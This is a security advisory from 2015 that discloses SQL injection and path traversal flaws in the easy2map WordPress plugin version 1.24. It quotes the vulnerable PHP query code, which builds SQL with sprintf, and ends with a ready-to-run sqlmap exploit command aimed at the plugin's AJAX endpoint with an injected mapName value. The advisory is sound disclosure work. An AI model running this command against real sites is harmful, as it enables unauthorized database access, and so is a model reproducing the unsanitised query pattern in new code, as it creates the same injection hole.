Advisory #: 131
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
[CVE-2015-4614][CVE-2015-4616]
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or properly parameterize the query to the database. 62 $wpdb->query(sprintf("UPDATE $mapsTable 63 SET PolyLines = '%s' 64 WHERE ID = '%s';", $PolyLines, $mapID)); . . . 132 $wpdb->query(sprintf(" 133 UPDATE $mapsTable 134 SET TemplateID = '%s', 135 MapName = '%s', 136 Settings = '%s', 137 LastInvoked = CURRENT_TIMESTAMP, 138 CSSValues = '%s', 139 CSSValuesList = '%s', 140 CSSValuesHeading = '%s', 141 MapHTML = '%s', 142 IsActive = 1 143 WHERE ID = %s;", 144 $Items['mapTemplateName'], 145 $Items['mapName'], 146 urldecode($Items['mapSettingsXML']), 147 urldecode($Items["mapCSSXML"]), 148 urldecode($Items["listCSSXML"]), 149 urldecode($Items["headingCSSXML"]), 150 urldecode($Items["mapHTML"]), $mapID)); 151 } else { 152 153 //this is a map insert 154 if (!$wpdb->query(sprintf(" 155 INSERT INTO $mapsTable( 156 TemplateID, 157 MapName, 158 DefaultPinImage, 159 Settings, 160 LastInvoked, 161 PolyLines, 162 CSSValues, 163 CSSValuesList, 164 CSSValuesHeading, 165 MapHTML, 166 IsActive 167 ) VALUES ('%s', '%s', '%s', '%s', 168 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0);", 169 $Items['mapTemplateName'], 170 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/p ins/111.png", 171 urldecode($Items['mapSettingsXML']), '', 172 urldecode($Items["mapCSSXML"]), 173 urldecode($Items["listCSSXML"]), 174 urldecode($Items["headingCSSXML"]), 175 urldecode($Items["mapHTML"])))) { 176 die("Error!"); 177 } . . 231 $wpdb->query(sprintf(" 232 UPDATE $mapsTable 233 SET MapName = '%s', 234 LastInvoked = CURRENT_TIMESTAMP, 235 IsActive = 1 236 WHERE ID = %s;", $mapName, $mapID)); Path Traversal in Functions.php 221 $imagesDirectory = WP_CONTENT_DIR . "/uploads/"; if (!is_dir($imagesDirectory)) { mkdir($imagesDirectory); } $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/"; if (!is_dir($imagesDirectory)) { mkdir($imagesDirectory); } $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/"; if (!is_dir($imagesDirectory)) { mkdir($imagesDirectory); } $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/"; if (!is_dir($imagesDirectory)) { mkdir($imagesDirectory); 254 } CVE-2015-4614 for SQL injection CVE-2015-4616 for Path traversal
Export: JSON TEXT XML
Exploit Code:
  1. $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Screen Shots:
Notes: